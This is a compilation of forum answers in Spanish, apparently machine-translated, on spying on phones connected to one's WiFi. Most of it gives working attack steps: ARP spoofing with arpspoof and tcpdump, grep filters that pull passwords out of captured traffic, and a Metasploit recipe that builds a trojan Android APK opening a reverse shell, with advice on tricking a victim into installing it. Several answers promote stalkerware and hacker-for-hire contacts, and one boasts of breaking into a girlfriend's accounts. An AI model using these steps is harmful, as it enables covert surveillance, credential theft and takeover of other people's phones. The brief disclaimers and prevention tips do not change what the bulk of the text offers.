Cómo espiar los teléfonos conectados a mi punto de acceso WiFi

¿Cómo puedo espiar los teléfonos conectados a mi punto de acceso WiFi?

DESCARGO DE RESPONSABILIDAD: Las técnicas descritas y presentadas aquí tienen fines educativos.

Solo porque alguien conectado a su WiFi / Red con su permiso (Abierto | Cerrado) no le da ninguna tarjeta gratuita para rastrear ninguno de sus datos sin ningún consentimiento o permiso previo por escrito, consulte las leyes antes de intentar cualquier técnica descrita aquí.

Seamos específicos sobre lo que puedes espiar.

  1. Llamada telefónica ?
  2. Mensajes de texto)?
  3. ¿Mensaje de voz?
  4. Registro de llamadas?
  5. Video, fotos?
  6. Sitio web visitado / nombre de usuario y contraseña de correo electrónico?

Antes de lanzar o proteger cualquier ataque espía, debe comprender cómo funciona la telecomunicación en las diferentes capas.

Es imposible rastrear cualquier elemento del n. ° 1 al n. ° 5 sin utilizar otras técnicas, ya que las llamadas regulares de teléfono móvil se realizan a través de la torre celular más cercana y no por su WiFi, al igual que el correo de voz y los mensajes de texto, etc.

Sin embargo, los sitios web visitados, como Facebook, Twitter, Gmail, eBay, Amazon, como el nombre de usuario y la contraseña, y otros datos POST | GET se pueden rastrear desde una red inalámbrica o cableada.

Sé que el ataque Man-In-The-Middle se menciona demasiado aquí, pero no veo dónde se explica a fondo.

El hecho de que haya visto algunos videos sobre BackTrack , el ataque Kali Linux Man-in-The-Middle no significa que funcione al 100% ni lo convierta en un mejor hacker, es posible que esté infringiendo las leyes que lo pueden meter en problemas sin saberlo, tenga cuidado !

¿Por qué el hombre en el medio ataque es toro?

PRUEBA DE SANIDAD: ¿Qué haría si su navegador web le notificara que el sitio web que está a punto de visitar no es confiable y peligroso?

Si no acepta continuar navegando en sitios web no confiables y cierra el navegador, sus técnicas para rastrear los datos enviados a través de SSL no funcionarán.

Esta es la misma razón por la que se le pidió que apagara su antivirus en el host de Victim antes de iniciar un MITM . Simplemente porque la mayoría de los antivirus vienen con las reglas predeterminadas de firewall que pueden detener el ataque MITM. Entonces es una tontería decirle a una víctima “Hey, apague su firewall para que pueda realizar un ataque MITM en su computadora” para desactivar su seguridad ya que cada sistema operativo viene con un conjunto mínimo de políticas de seguridad predeterminadas.

Sé que estás pensando eso; La combinación con SSLStrip funcionará. ¡Sí! eso funcionará para aquellas personas a las que no les importa escribir información en ningún sitio web que no muestre un https seguro, porque las técnicas SSLStrip eliminarán la s’ de https: // , por lo tanto, el sitio web de Facebook se verá como

  • http: // www.facebook.com

en lugar de

  • https: //www.facebook.com

¿Por qué alguien iniciaría sesión en una cuenta segura, con un enlace no seguro?

Configuración: Ataque el enrutador, NO el host.

Su enrutador ( también conocido como Real Router ) es su puerta de enlace donde todos los hosts que están conectados a su WiFi envían y reciben sus DATOS.

Analogía : si pudieras instalar una cámara especial en el pomo de tu puerta, esto te permitirá ver a todos los que tocan el pomo de la puerta o entran a tu casa. ¿Qué sucede si esta cámara especial tiene funciones inversas, funciones de rayos X y puede detectar y mostrar cada objeto que lleva cualquier persona que entre o salga de su edificio ? Así es como funciona este ataque, con una cámara especial que mira o graba todos los datos que entran por su puerta (enrutador).

Hackear tu propio enrutador antes que Bad Guy.

¿Qué sucede si puede fingir que es el Enrutador real y ser presentado al host (s) como un Enrutador legítimo para engañar a todos los dispositivos conectados y enviarle DATOS al ” Enrutador falso”?

Fake Router guardará todos los DATOS interceptados para la búsqueda del tesoro más adelante y redirigirá los DATOS originales al Enrutador real para la entrega adecuada a su destino final.

¿Cómo funciona?

Normalmente, cuando un Enrutador Real recibe respuesta para el host de la víctima desde Internet o un sistema, envía los DATOS al host de la víctima. Usando el mismo método fingiendo ser el anfitrión de la víctima y Real Router le enviará todos los DATOS, guardará los DATOS interceptados y redirigirá los DATOS originales recibidos al anfitrión de la víctima real y viceversa.

El atacante leerá el registro interceptado guardado y buscará y encontrará sus tesoros (nombre de usuario, contraseña, lo que sea, etc.).

DATOS DE SNIFFING Ejemplo # 1:

¿Por qué atacar los datos enviados a través del navegador (ataques MITM) cuando se puede rastrear todo el grupo de datagramas de una red?

La mayoría de las aplicaciones de telefonía móvil se vuelven a autenticar una vez que hay conexión a Internet, lo que significa que envían DATOS de autenticación a sus servidores que a veces contienen nombre de usuario y contraseña no cifrados o cifrados tan pronto como se conecta un teléfono móvil y se detecta la presencia de Internet. Todos los DATOS de autenticación pueden ser interceptados y falsificados, reenviados al servidor para volver a autenticarse como lo haría un cliente legítimo.

¿Estás pensando cómo es eso posible? , ARPSpoof distribuido por DSniff le permite hacer exactamente eso. Necesitará otras herramientas y técnicas para descifrar cualquier DATO cifrado sobre la marcha, ¡y ese es otro tema!

Para tener una idea, pongamos esto en un pequeño laboratorio muy pequeño, usando elementos que ya tienes si estás leyendo esto.

Requisito:

  • Su Wifi / Enrutador.
  • Tu móvil – víctima.
  • Su computadora portátil (linux): atacante.

El propósito de este laboratorio es mostrarle cuán fácil cualquier Huésped que permitió en su red puede explotar su red y recibir sus datos sin su conocimiento.

¿POR QUÉ ES ES PELIGROSO?

¿Solo si pudieras imaginar a un atacante sentado en el lobby de un hotel, en la sala de espera del hospital, en Starbucks con acceso wifi gratuito o en el wifi de tu casa, explotar la red e interceptar todos los datos que entran y salen de ese segmento de red?

En este pequeño laboratorio, conectará su teléfono móvil a su wifi como lo hace normalmente, y también conectará su computadora portátil a su wifi como lo harían sus clientes / invitados / clientes en su casa, sala de espera o lobby en su lugar de trabajo. ¡Este invitado es un atacante potencial!

OBJETIVOS

  • Podrá rastrear SU paquete viajando desde su teléfono móvil a través de su enrutador hacia el mundo (internet) como lo haría cualquier atacante.
  • Y aprenda un método de prevención para mitigar dicho ataque.

Paso 1:

El atacante abre una terminal y escanea tu red para encontrar la dirección IP objetivo / víctima y MAC.

Sin usar ninguna herramienta, para localizar el host (s) en vivo, el atacante puede hacer:

Paso 1a:

ip addr show

# Muestra la dirección IP con CIDR, es decir, / 24 o / 16 o

ifconfig

# lista de direcciones IP y nombre de interfaz,

Paso 1b: ahora haga ping a las direcciones IP para descubrir hosts en vivo usando el comando one-liner sin herramienta de terceros.

for i in {1..254}; do ping -c 1 -W 1 192.168.0.$i | grep 'from'; done

Por supuesto, podemos usar cualquier herramienta de terceros para lograr resultados de descubrimiento de host similares o mejores, como los siguientes:

apt-get install netdiscover -y
netdiscover -i wlan0
arp-scan 192.168.1.0/24 -interface wlan0

Los comandos anteriores enumeran todos los hosts en vivo? ¡Ya que es difícil atacar a cualquier host fuera de línea! con el comando anterior, obtiene nombres de hosts conectados , dirección IP y mac , nombre para una fácil identificación, por ejemplo:

netdiscover -i wlan0

192.168.0.1 00: 11: 22: 33: 47: xx: Enrutador real
192.168.0.21 00: 11: 22: 33: 44: xx: iPhone de la víctima
192.168.0.22 00: 11: 22: 33: 40: x0: escritorio de la víctima
192.168.0.23 00: 11: 22: 33: 49: xx: POS de la víctima
192.168.0.23 00: 11: 22: 33: 48: xx: Impresora de la víctima

Ahora que descubrió los hosts conectados, la dirección IP, MAC, es hora de cambiar su NIC de interfaz al modo PROMISCUOUS. Recuerde que el atacante está interesado en atacar el enrutador, de esta manera los datos de otros dispositivos enviados al enrutador real se envían primero al atacante, luego el atacante lo reenviará al enrutador y viceversa.

¿Qué es el modo prometedor?

El modo promiscuo permite que la interfaz (si es compatible) vea todos los tráficos en la red en todas las direcciones. Por lo tanto, el atacante podrá ver datos de un segmento de red, incluido el host que la víctima envía y recibe.

Paso 2: modo promisorio

Compruebe si su interfaz PROMISC está activada con

ifconfig wlan0
# si no está activado, active el modo promisc con:
ifconfig wlan0 PROMISC on

El atacante lo revisa nuevamente para asegurarse, ¡porque las cosas están a punto de caer!

ifconfig wlan0

PROMISC mode is ON.

Paso 3. Olfatear los paquetes ─ búsqueda del tesoro digital

~ # apt-get install arpspoof -y #si aún no está instalado
~ # arpspoof -t dirección-ip-myphone-dirección-ip-mi-router
~ # arpspoof -t mi-enrutador-dirección-IP myphone-dirección-ip

Ahora siéntese y observe los tráficos volando a través del cable o capturados para su posterior análisis; El uso de este pequeño comando puede permitirle ver lo que sucede en tiempo real:

# tcpdump host myphone-ip-address y no arp

O el atacante puede simplemente conectarse a su red, lanzar el ataque, salir a fumar un cigarrillo (evitando estar en la escena) mientras guarda los datos para su uso posterior con un comando similar a este:

# tcpdump host myphone-ip-address y no arp -w victim.pcap

Para capturar o guardar otros datos, sustituya la dirección IP con myphone-ip-address

¿Qué datos se capturan?

Datos cifrados y no cifrados enviados y recibidos al enrutador de las víctimas, esto incluye nombre de usuario, contraseña, información de tarjeta de crédito, etc.

Sin embargo, los datos como SMS, conversación telefónica o medios de comunicación que viajan a través de sitios celulares no se pueden rastrear a través de la red sin emplear otras técnicas.

Para ver los datos habitualmente analizados en tiempo real, abra otra terminal y haga lo siguiente:

tcpdump puerto http o puerto https o puerto ftp o puerto smtp \
o port imap o port pop3 -l -A | egrep -i \
‘pass = | pwd = | log = | login = | user = | username = | pw = | passw = | passwd = \
| contraseña = | contraseña: | usuario: | nombre de usuario: | contraseña: | inicio de sesión: | contraseña | usuario ‘\
–Color = auto –line-buffer -B20

o vea los DATOS ASCII no encriptados como en su red con:

tcpdump puerto http o puerto ftp o puerto smtp \
o port imap o port pop3 -l -A | cuerdas | \
egrep -i ‘pass = | pwd = | log = | login = | user = | username = \
| pw = | passw = | passwd = | contraseña = | pass: | usuario: | nombre de usuario: \
| contraseña: | inicio de sesión: | contraseña | usuario ‘–color = auto –line-buffered -B20

NOTA: Ajuste el puerto según sea necesario, por ejemplo, para detectar el tráfico web cifrado, agregue https

Vaya a cualquier sitio web en su teléfono u otra computadora portátil conectada, navegue, ingrese datos, haga clic en enviar y mire su terminal para obtener la información enviada.

Esto, por supuesto, garantiza que el navegador host de la víctima no tenga ningún conocimiento de detección, por lo que no se muestra ningún error de desajuste del certificado.

MÉTODOS DE PREVENCIÓN

Si bien existen muchos métodos para prevenir este tipo de ataques. El método más simple es:

  1. Defina lo que su invitado puede ver o tener acceso en su red
  2. Dar al invitado una subred de dirección IP diferente
  3. VLAN su red, su invitado NUNCA debería poder hacer ping a ningún dispositivo en otra red que no sea GUEST.
  4. Configurar firewall y reglas personalizadas para detectar y mitigar estos ataques

Por ejemplo, cuando un invitado se conecta a mi red, se le emite una dirección IP como 10.10.15.xxx a 10.10.15.xxx con el enrutador predeterminado de la red de invitados de 10.10.15. 1 y red doméstica en 192.168.100.xxx a 192.168.100.xxx con puerta de enlace predeterminada de la red doméstica de 192.168.100.1

Todos los invitados o posibles atacantes siempre estarán en la red 10.10.15.0 y no podrán ver a nadie en 192.168.100.xxx ni rastrear ningún paquete que vaya a 192.168.100.1, si se detecta alguna actividad como el escaneo, el firewall se desconectará y registrará dicho evento bloquear la ip por x cantidad de horas en la red.

Lógica, cuando se convierte en proveedor de otras direcciones IP, se puede acceder a cualquier cosa que pase por su dispositivo si tiene un software para registrar lo que está pasando. Sin embargo, la recopilación de datos personales y el uso de esos datos para espiar o beneficiarse en la venta de información sería violar la ley.

* Network Sniffing. Para robar su información personal, todo lo que necesita un atacante es una aplicación de “rastreo” que intercepta y reúne todo el tráfico visible en un canal. Aunque WPA2 cifra cada conexión entre una red Wi-Fi y el cliente de un usuario, solo está diseñada para mantener a las personas que no conocen el PSK fuera de la red. Si un atacante huele el apretón de manos de cuatro vías y captura el PSK, puede descifrar todo el tráfico designado a su dispositivo hasta que se cambie el PSK. Incluso si el atacante no tiene el PSK, puede tratar de oler los datos y luego usar la fuerza bruta para descubrir la clave. La calidad de la PSK que selecciona un administrador de red inalámbrica (es decir, longitud, letras diferentes, uso de símbolos o palabras conocidas) puede tener un impacto en lo fácil o difícil que es obtener la clave.

Muchos otros usuarios ya han dado instrucciones específicas sobre cómo “escuchar” las conexiones para que no las duplique.

Si controla el punto de acceso WiFi, tiene la capacidad de monitorear el tráfico de entrada y salida con las herramientas adecuadas y saber cómo hacerlo. Solo podrá monitorear lo que ocurre en WiFi, no llamadas telefónicas, mensajes de texto y datos cuando los usuarios están conectados a su proveedor de telefonía celular.

Ahora se está volviendo más difícil monitorear ya que más sitios web, servicios y aplicaciones se están moviendo hacia el cifrado. En su mayor parte, no puede monitorear las comunicaciones que están encriptadas correctamente. Estos incluyen muchos sitios de correo electrónico como Gmail, Yahoo, Outlook, etc. Los bancos, los comerciantes en línea y muchos servicios gubernamentales también están encriptados. Muchas de las aplicaciones también ofrecen cifrado, algunas de extremo a extremo. Las personas que usan una VPN agregan otro nivel de encriptación a la mezcla.

En resumen, con más comunicaciones utilizando encriptación, básicamente está limitado a monitorear cosas en texto plano, y eso se está volviendo más raro a medida que toda la web avanza hacia la encriptación.

** De ninguna manera defiendo a nadie que haga esto. Esto es sólo con fines educativos. Cuando sabes cómo alguien podría atacarte, tienes una mejor oportunidad de defenderte y protegerte contra él **

Desde la perspectiva de los atacantes:

Antes de hacer nada, consulte WCH Cyber ​​Security | Vamos a ayudarte a hackear

  • Si puede comprometer el dispositivo que se está ejecutando en la red WIFI, entonces tiene una oportunidad. Si está ejecutando Phone, tiene una probabilidad ligeramente mayor que iOs. Si el dispositivo está liberado o enraizado, entonces tiene una posibilidad aún mayor.
  • Por supuesto, podría diseñar su forma de obtener su contraseña. Ya sea por contacto directo con la persona o husmeando en sus perfiles de redes sociales en busca de posibles “contraseñas”. Muchas personas usan su nombre, ubicación, fecha de nacimiento, nombres de niños, nombre de la calle, ciudad, etc. como parte de su contraseña.
  • Muchas personas reutilizan contraseñas. Lo que significa que si puede comprometer una cuenta de redes sociales diferente o cualquier otra cuenta en línea y obtener una contraseña, puede probar esa contraseña en sus teléfonos móviles.
  • Haga clic y visite WCH Cyber ​​Security | Vamos a ayudarlo a hackear puede ayudarlo a descubrirlo fácilmente. Él resolverá todos sus problemas relacionados con el espionaje y la obtención de información

No estoy realmente seguro de lo que quieres decir. ¿Desea escuchar las llamadas telefónicas, ver los mensajes de texto enviados por sus hijos o controlar los hábitos de Internet de un cónyuge?

Sin embargo, la mayoría de las telecomunicaciones, como los mensajes de texto o las llamadas, no son manejadas por una red WiFi, sino por una torre celular que hace que espiar los teléfonos sea más difícil. Si los teléfonos que intenta espiar son iPhones, las comunicaciones se cifran y se envían a los servidores de Apple. Lo mismo con Whatsapp, una popular aplicación de mensajería instantánea.

Puede descargar un programa llamado Wireshark (www.wireshark.org) a una computadora. Después de configurar el programa, puede monitorear todas las comunicaciones enviadas a través de su red WiFi. Este programa capturará toda la información enviada a través de una red WiFi, pero no podrá ver ninguna información encriptada (llamadas telefónicas, mensajes de texto, navegación web usando una VPN).

Alternativamente, puede simplemente mirar por encima del hombro de la persona a la que está tratando de espiar.

Saludos

Lo encontré en un foro.

“Esto es bastante simple. Todo lo que necesitas es metasploit y un poco de habilidades de ingeniería social. Esta es una fuente adicional para ayudarlo. Lo que haces es abrir una terminal y poner:

msfpayload android / meterpreter / reverse_tcp LHOST = (su dirección IP de LAN) LPORT = 8080 R> /root/Desktop/coolapp.apk

Este comando debería proporcionarle un archivo llamado coolapp.apk en el escritorio. Ahora necesitamos configurar un oyente para que cuando el objetivo abra la aplicación, tengamos pirateado su Android.

Primero abriremos la consola de metasploit escribiendo “msfconsole”
Una vez que la consola de metasploit esté abierta, escribiremos,

usar exploit / multi / handler
Presiona regresar y sigue como lo hago
establecer la carga útil de Android / meterpreter / reverse_tcp
Ahora debería tener la carga útil configurada, ahora configuraremos las conexiones
establecer lhost (su dirección IP de LAN)
Ahora su host local está configurado, pero aún necesitamos configurar el puerto.
establecer lport 8080

Presiona enter, ahora desde aquí usamos un poco de ingeniería social para dar el archivo en el escritorio titulado, coolapp.apk, a alguien que lo abra en su teléfono Android. Una vez que le haya dado a alguien la aplicación y esté a punto de abrirla, regrese a su consola de metasploit y escriba:

explotar

Esto debería abrir una conexión pronto con el teléfono Android objetivo donde puede hacer cosas como grabar su micrófono, tomar una foto en su cámara, mirar sus llamadas, mirar sus contactos y su dirección “.

Cuando su teléfono celular (o el de las víctimas) se conecta a wifi, se puede recopilar y revisar fácilmente mucha información. El método más fácil es usar una tarjeta Wifi en su computadora que tenga el modo promiscuo o monitor y un programa llamado Wireshark. Esto recopilará todo el tráfico wifi cifrado y no cifrado de forma pasiva sin que su víctima sepa que sus datos están siendo rastreados. Piense en ello como un escáner policial o una radio FM. Usando wireshark puede “grabar” los datos wifi o “paquetes”.

Una vez que se guardan los paquetes, puede revisar los datos en busca de cosas jugosas como cargas de archivos, transferencias de imágenes, cualquier cosa que no se haya enviado a través de SSL. Para un principiante, una herramienta realmente fácil de ver todos estos datos sería el software gratuito Netwitness Investigator (EMC Corporation). Lo sentimos, pero no habrá llamadas telefónicas, pero sin duda puede ver el nombre de usuario / contraseñas en texto claro y otros datos que no están encriptados.

Lo haría configurando un sniffer de paquetes en una computadora que se puede dejar encendido en todo momento. A partir de ahí, configure el sniffer de paquetes para monitorear las direcciones IP conocidas de los teléfonos en cuestión (en IOS, esto se puede hacer yendo a Configuración> Wifi> Presione el pequeño botón I cerca * Inserte el nombre de la red actualmente conectada aquí *> Mire el campo que dice Dirección IP. No tengo un Android, así que no puedo decirte cómo hacerlo en uno de esos). Después de tenerlo en funcionamiento, puede verificar los paquetes y ver qué tipo de tráfico va hacia y desde los teléfonos en cuestión y actuar de acuerdo con sus necesidades para configurar dicho sniffer de paquetes.

1.conéctese a la red wifi igual que el teléfono móvil.

2. Luego realice el sniffing de intermediario o llamado ARP sniffing que simplemente canaliza los datos entre el dispositivo móvil objetivo y el enrutador.

3.Utilice Wire Shark y en la IP móvil verifique los paquetes entrantes y salientes para verificar qué sitios web están visitando.

4.también puedes ver las imágenes usando DSNIFF.

5.Puede ver la URL a la que accede mediante URLSNARF.

Puede hacerlo fácilmente desde un teléfono Android usando aplicaciones como zANTI 2 y Network Spoofer.

Puede redirigirlos a un sitio web personalizado, puede volcar las imágenes que buscan y los sitios web que visitan, etc. Todo esto es gratuito.

Pero hay una excelente manera de controlar el teléfono de otra persona utilizando métodos Premium como TheTruthSpy. Todo lo que necesita hacer es pagarles unos dólares y obtener un archivo apk (TheTruthSpy.apk) instalado en el teléfono de su víctima y ya está listo. Luego, después de que pueda comenzar a espiar sus teléfonos por completo.

TheTruthSpy también ofrece un servicio gratuito que le permite espiar los registros de llamadas y los SMS. .. !!

Dicen que la información es la mejor herramienta que uno puede tener.

La calidad de la información disponible determina hasta dónde puede llegar

He leído algunas publicaciones aquí que dicen que Facebook, WhatsApp, Twitter, Instagram, Gmail y otras aplicaciones / cuentas no pueden ser pirateadas. Personalmente, también creía que hasta el momento en que tenía acceso a información básica, sabía que cualquier cosa podía ser pirateada.

Conocí a un chico de la computadora llamado fantasmas web no hace mucho tiempo y me dijo algo; él dijo “cualquier cosa que internet / computadora pueda ser hackeada, todo tiene un agujero”. Al principio, nunca creí, pero me convencí cuando pirateó la cuenta de Gmail de mi novia, la cuenta de Facebook y, al mismo tiempo, su cuenta de WhatsApp. Sé que es algo malo, no me culpes. Necesitaba estar seguro. Debe haber asistido a una de las escuelas de grado superior y haber aprendido de los mejores.

Es muy diferente de otros hackers y lo que lo hace diferente es su CARACTERÍSTICAS DE GHOST.

Para las personas que dudan si las cuentas pueden ser pirateadas, es posible que desee probar este tipo y verlo por usted mismo.

Además, ver es creer.

Este es su número de teléfono celular: +19951999 6434

¿Mencioné que también hace otros trabajos relacionados con la computadora / internet?

Oh si, lo hace.

¿Por qué no le contactas y dejas que aclare tus dudas?

También podría beneficiarse de sus increíbles servicios como yo.

Una de las formas más fáciles es utilizar un rastreador de paquetes como Wireshark. Sin embargo, algunos dispositivos móviles tienen un cifrado bastante decente y pueden inutilizar algunos de los paquetes que “olfatea” a menos que esté familiarizado con el descifrado y los archivos hash. Vería un tutorial sobre Wireshark de una fuente respetable y responsable (administradores de seguridad de red / profesores / gurús en línea). Sin embargo, el uso ilegal de los datos es un tema completamente diferente. Si está tratando de eliminar dispositivos extraños, use ARP para identificar qué direcciones MAC son suyas y cuáles no.

Si desea ver lo que está sucediendo, en su red inalámbrica haga lo siguiente:
1) Realizar un ataque ARP spoofing que redirige todo el tráfico hacia usted; y
2) Use Wireshark para leer los datos que lo atraviesan, de regreso al enrutador y a Internet.

Tenga en cuenta que esto probablemente fallará si no sabe qué es Wireshark, redes básicas TCP / IP, Linux, etc.
Además, no podrá leer SSL / TLS.

Al iniciar sesión en la red inalámbrica y abrir Wireshark, es probable que vea mensajes de difusión que puede usar para identificar la marca, MAC, etc.

Alternativamente, inicie sesión en el panel de control de su enrutador y vea la lista de “clientes asociados”, que muestra una lista de todo lo conectado a ese punto de acceso inalámbrico.

La información anterior se proporciona únicamente con fines éticos, legales y educativos.

Si puede insertar un concentrador de red (no un conmutador) entre el punto de acceso y la red ascendente (módem, enrutador, etc.), puede ver el tráfico con un programa de captura, como wireshark.
Algunos conmutadores o enrutadores (comerciales, Juniper, Cisco, etc.) permiten configurar un puerto para reflejar todo el tráfico, de modo que pueda monitorear todo lo que ingresa o sale de su red.
Si configura su cuadro combinado como un punto de acceso puro y su PC como un enrutador (con 2 tarjetas de red), nuevamente puede monitorear todo lo que pasa.

Usando METASPLOIT.
Debe crear una puerta trasera (archivo apk malicioso). Envíe este archivo a la víctima, una vez que lo abra, podrá enviarle el teléfono a la víctima de forma remota. Puede leer mensajes, ver fotos, eliminar cualquier archivo, guardar contraseñas y todo lo que quieras hacer.
Hay otra herramienta: androrat .it es fácil de usar ya que tiene interfaz gráfica de usuario y está disponible para Windows.

Supongo que la detección de redes sería el término correcto. Puedo sugerirle un método legal simple usando su teléfono móvil.

Si tiene un dispositivo Android, descargue una aplicación llamada “Fing”. Este software le permite ver todos los dispositivos conectados a su punto de acceso wi-fi.

Se puede ver la siguiente información:

  • Dirección IP
  • Dirección MAC
  • Modelo de marca
  • Proveedor MAC
  • Sistema operativo
  • Primera fecha vista

Puede solicitar a la aplicación que escanee los servicios, haga ping, rastree la ruta, se active en LAN, bloquee el dispositivo …

Le muestra si el dispositivo está en línea y puede notificarle cuando cambie el estado.

Un simple sniffer de paquetes le permitirá interceptar paquetes entrantes / salientes para ver un conjunto base de lo que está sucediendo. También puede usar un dispositivo como un Raspberry-pi para crear lo que se llama un “honeypot” que crea un punto de acceso que se ve idéntico a un enrutador inalámbrico, los dispositivos se conectarán al “honeypot” en lugar del enrutador en red.

Necesitará una PC con Kali Linux o un dispositivo Android (tiene que estar rooteado) y una aplicación llamada Csploit / zAnti.

Mira algunos videos, enséñate a ti mismo.

Ten cuidado amigo, ya que piratear es ilegal.

Puede crear su propio servidor VPN y enrutar sus teléfonos a través de Internet. Podrías capturar todo el tráfico de esa manera.

Hak5 2022: compilación de VPN rápida, gratuita y fácil en minutos

Puede hacer esto fácilmente con MITMa.

en caso de que no sepas qué se lee MITMa desde aquí Ataque Man-in-the-middle – Wikipedia

si está usando Android, use la aplicación Zanti (no funcionará por completo, pero funciona)

para el secuestro anticipado, use las herramientas de Kali Linux.